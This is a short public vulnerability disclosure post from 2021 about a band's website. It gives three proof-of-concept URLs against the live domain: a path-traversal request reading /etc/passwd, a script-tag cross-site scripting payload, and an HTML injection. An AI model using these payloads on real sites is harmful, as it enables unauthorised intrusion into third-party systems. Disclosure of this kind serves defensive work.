The Ravage Website Multiple Vulnerabilities

2021.06.22

Rômulo (BR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

what's up security guys, rômulo (século xxi) in the your network!

website: www.ravagedband.com
vulnerabilities: local file inclusion, cross-site scripting, html injection

proof of concept

lfi example: https://www.ravagedband.com/index.php?page=../../../../../../../../../etc/passwd

xss example: https://www.ravagedband.com/index.php?page=%3Cscript%3Ealert(%27your%20security%20is%20low%27)%3C/script%3E

html injection example: https://www.ravagedband.com/index.php?page=<p>your security is low</p>

the end!

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

The Ravage Website Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

The Ravage Website Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.